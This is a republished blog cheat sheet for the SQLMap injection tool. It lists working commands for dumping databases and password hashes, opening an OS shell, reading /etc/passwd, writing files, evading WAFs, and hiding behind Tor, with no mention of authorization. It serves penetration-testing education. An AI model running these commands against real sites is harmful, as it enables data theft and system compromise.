SQLMap Cheat Sheet: A Quick Guide for Automated SQL Injection

Author: Trix Cyrus

What is SQLMap?
SQLMap is an open-source penetration testing tool used to detect and exploit SQL injection vulnerabilities in web applications. It supports various database systems like MySQL, PostgreSQL, Oracle, Microsoft SQL Serve…


This content originally appeared on DEV Community and was authored by Trix Cyrus

Author: Trix Cyrus

What is SQLMap?
SQLMap is an open-source penetration testing tool used to detect and exploit SQL injection vulnerabilities in web applications. It supports various database systems like MySQL, PostgreSQL, Oracle, Microsoft SQL Server, and more.

Basic Usage
To start with SQLMap, you can run it in its simplest form by providing the target URL:

sqlmap -u "http://example.com/index.php?id=1"

This command scans the target URL for SQL injection vulnerabilities.

1. Detecting Vulnerabilities
Use the following options to perform a basic vulnerability scan and automatically detect SQL injection points:

sqlmap -u "http://example.com/index.php?id=1" --dbs

--dbs: Lists all available databases on the target server if a vulnerability is found.

2. Specifying POST Requests

For targets that require a POST request (usually in login forms), you can specify the data like this:

sqlmap -u "http://example.com/login.php" --data="username=admin&password=1234"

3. Bypassing WAFs and Filters

To evade Web Application Firewalls (WAFs), SQLMap includes payload obfuscation techniques:

sqlmap -u "http://example.com/index.php?id=1" --tamper=space2comment

--tamper: Uses tamper scripts to evade filters. Example: space2comment, charencode.

4. Extracting Databases, Tables, and Columns
To get a list of databases on the target system:

sqlmap -u "http://example.com/index.php?id=1" --dbs

Once a database is identified, extract its tables:

sqlmap -u "http://example.com/index.php?id=1" -D database_name --tables

To get columns from a specific table:

sqlmap -u "http://example.com/index.php?id=1" -D database_name -T table_name --columns

5. Dumping Data

Dumping the contents of a table is one of the most useful features of SQLMap. For example, to dump all data from a specific table:

sqlmap -u "http://example.com/index.php?id=1" -D database_name -T table_name --dump

6. Enumerating Database Users and Passwords

SQLMap can also be used to enumerate database users and even crack hashed passwords:

sqlmap -u "http://example.com/index.php?id=1" --users
sqlmap -u "http://example.com/index.php?id=1" --passwords

7. Accessing the Operating System

In some cases, SQLMap can be used to execute commands on the operating system, especially when the database user has high-level privileges:

sqlmap -u "http://example.com/index.php?id=1" --os-shell

This will provide an interactive shell where you can execute commands on the target system.

8. File Upload and Reading

You can also read files from the target system or upload malicious files (if permitted):

sqlmap -u "http://example.com/index.php?id=1" --file-read="/etc/passwd"
sqlmap -u "http://example.com/index.php?id=1" --file-write="/path/to/file" --file-dest="/destination/path"

9. Using Tor for Anonymity

To hide your identity, you can run SQLMap through the Tor network:

sqlmap -u "http://example.com/index.php?id=1" --tor --tor-type=SOCKS5 --check-tor

--tor: Enables Tor.
--check-tor: Verifies if the connection is made through Tor.

10. Saving and Resuming Sessions

SQLMap allows you to save and resume your progress by using the --session option:

sqlmap -u "http://example.com/index.php?id=1" --session=your_session_name

Later, you can resume the same session by:

sqlmap -r your_session_name

11. Verbose Mode

To see detailed information about what SQLMap is doing:

sqlmap -u "http://example.com/index.php?id=1" -v 3

The -v option controls verbosity (levels from 0 to 6, where 6 shows all details).

  1. Automated Scans for Multiple Targets

SQLMap supports scanning multiple URLs stored in a file:

sqlmap -m urls.txt --batch

--batch: Automatically answer all prompts with default options, useful for automated scanning.

also use --risk=3 and --level=5 to advance scanning
You can use this cheat sheet to introduce readers to the essential commands of SQLMap and help them get started with SQL injection testing.

~TrixSec


This content originally appeared on DEV Community and was authored by Trix Cyrus


Print Share Comment Cite Upload Translate Updates
APA

Trix Cyrus | Sciencx (2024-09-26T05:35:01+00:00) SQLMap Cheat Sheet: A Quick Guide for Automated SQL Injection. Retrieved from https://www.scien.cx/2024/09/26/sqlmap-cheat-sheet-a-quick-guide-for-automated-sql-injection/

MLA
" » SQLMap Cheat Sheet: A Quick Guide for Automated SQL Injection." Trix Cyrus | Sciencx - Thursday September 26, 2024, https://www.scien.cx/2024/09/26/sqlmap-cheat-sheet-a-quick-guide-for-automated-sql-injection/
HARVARD
Trix Cyrus | Sciencx Thursday September 26, 2024 » SQLMap Cheat Sheet: A Quick Guide for Automated SQL Injection., viewed ,<https://www.scien.cx/2024/09/26/sqlmap-cheat-sheet-a-quick-guide-for-automated-sql-injection/>
VANCOUVER
Trix Cyrus | Sciencx - » SQLMap Cheat Sheet: A Quick Guide for Automated SQL Injection. [Internet]. [Accessed ]. Available from: https://www.scien.cx/2024/09/26/sqlmap-cheat-sheet-a-quick-guide-for-automated-sql-injection/
CHICAGO
" » SQLMap Cheat Sheet: A Quick Guide for Automated SQL Injection." Trix Cyrus | Sciencx - Accessed . https://www.scien.cx/2024/09/26/sqlmap-cheat-sheet-a-quick-guide-for-automated-sql-injection/
IEEE
" » SQLMap Cheat Sheet: A Quick Guide for Automated SQL Injection." Trix Cyrus | Sciencx [Online]. Available: https://www.scien.cx/2024/09/26/sqlmap-cheat-sheet-a-quick-guide-for-automated-sql-injection/. [Accessed: ]
rf:citation
» SQLMap Cheat Sheet: A Quick Guide for Automated SQL Injection | Trix Cyrus | Sciencx | https://www.scien.cx/2024/09/26/sqlmap-cheat-sheet-a-quick-guide-for-automated-sql-injection/ |

Please log in to upload a file.




There are no updates yet.
Click the Upload button above to add an update.

You must be logged in to translate posts. Please log in or register.